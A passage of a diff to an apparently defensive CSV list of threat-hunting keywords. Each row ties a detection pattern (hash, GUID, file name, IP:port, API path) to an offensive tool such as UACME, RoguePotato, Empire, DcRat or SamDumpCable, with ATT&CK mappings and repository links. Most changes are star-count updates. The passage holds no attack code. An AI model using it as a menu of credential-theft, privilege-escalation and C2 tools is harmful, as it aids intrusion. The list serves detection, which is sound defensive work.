T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*0xthirteen/StayKit*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*1_FindDomain.sh*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" -"*105C2C6D-1C0A-4535-A231-80E355EFB112*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" 
-"*10979d6665292065b840f8d95366201a686146e949908cdd41331699b331ab9c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*10b06fce5935839c3978cd7fe130355be750cfa03986adff5c33bd9f7922871e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*10f5885eb8ecc5ecbbea6717ba163761b34a416c7beff36276e7b590f39161b9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*105C2C6D-1C0A-4535-A231-80E355EFB112*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*10979d6665292065b840f8d95366201a686146e949908cdd41331699b331ab9c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 
+"*10b06fce5935839c3978cd7fe130355be750cfa03986adff5c33bd9f7922871e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*10f5885eb8ecc5ecbbea6717ba163761b34a416c7beff36276e7b590f39161b9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*10k-worst-pass.txt*","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*11385CC1-54B7-4968-9052-DF8BB1961F1E*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*119.45.104.153:8848*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*12372473c8b8cc25108b254a5ed994ee3895687236f8ad062006c1d8f6916475*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows 
AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*11385CC1-54B7-4968-9052-DF8BB1961F1E*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*119.45.104.153:8848*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*12372473c8b8cc25108b254a5ed994ee3895687236f8ad062006c1d8f6916475*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*123abcbde966780cef8d9ec24523acac*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","0","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" "*124e6ada27ffbe0ff97f51eb9d7caaf86b531bcff90ed5a075ff89b45b00cba5*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*127.0.0.1:1080*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" -"*127.0.0.1:1337*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*127.0.0.1:1337*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*127.0.0.1:2222*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" -"*127.0.0.1:31337*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*127.0.0.1:31337*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*127.0.0.1:4567*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" "*127.0.0.1:53531*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - 
TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" "*127.0.0.1:5555*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*127.0.0.1:8022*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" -"*127.0.0.1:8848*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*127.0.0.1:8848*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*127.0.0.1:9050*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*1337*/api/agents/*/results?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*1337*/api/creds?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 
- T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*1337*/api/listeners?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*1337*infernal-twin*","offensive_tool_keyword","infernal-twin","This tool is created to aid the penetration testers in assessing wireless security.","T1533 - T1553 - T1560 - T1569 - T1583","TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/entropy1337/infernal-twin","1","1","N/A","N/A","10","1193","273","2022-10-27T11:39:14Z","2015-02-07T21:04:57Z" -"*1337OMGsam*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*1337OMGsys*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*133f71bd8d6d4ca80a9a542c2492ba9a65e05b0cfa681a85dd05d9cf998a1bb4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*1424fde08d6994062fc8a795ff8d80d30060c4991103c4af59228dcf60171eca*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*1617117C-0E94-4E6A-922C-836D616EC1F5*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*16726c4330d7db5d56a5a11503314533b170783441c3f8282b66f126295a289e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*175c9fc0c7046d006a6db698144fab3b40bd191e15617e7fba417a466c3a0b6f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*1337OMGsam*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*1337OMGsys*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential 
Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*133f71bd8d6d4ca80a9a542c2492ba9a65e05b0cfa681a85dd05d9cf998a1bb4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*1424fde08d6994062fc8a795ff8d80d30060c4991103c4af59228dcf60171eca*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*1617117C-0E94-4E6A-922C-836D616EC1F5*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*16726c4330d7db5d56a5a11503314533b170783441c3f8282b66f126295a289e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*175c9fc0c7046d006a6db698144fab3b40bd191e15617e7fba417a466c3a0b6f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate 
backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*192.168.0.110:1234*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*192.168.1.229 Passw0rd!*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*1939a69f717d4baa13d558c11e1fc7dee1e8ce8fcc5f0fe0dea11845e22ce4c8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*195a6712e204e1d01dc1d36b9d43a2a477b0833019294b37512d8baaa98e524e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*1939a69f717d4baa13d558c11e1fc7dee1e8ce8fcc5f0fe0dea11845e22ce4c8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*195a6712e204e1d01dc1d36b9d43a2a477b0833019294b37512d8baaa98e524e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*1a279f5df4103743b823ec2a6a08436fdf63fe30*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*1BACEDDC-CD87-41DC-948C-1C12F960BECB*","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","27","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" +"*1BACEDDC-CD87-41DC-948C-1C12F960BECB*","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" "*1c50adeb-53ac-41b9-9c34-7045cffbae45*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - 
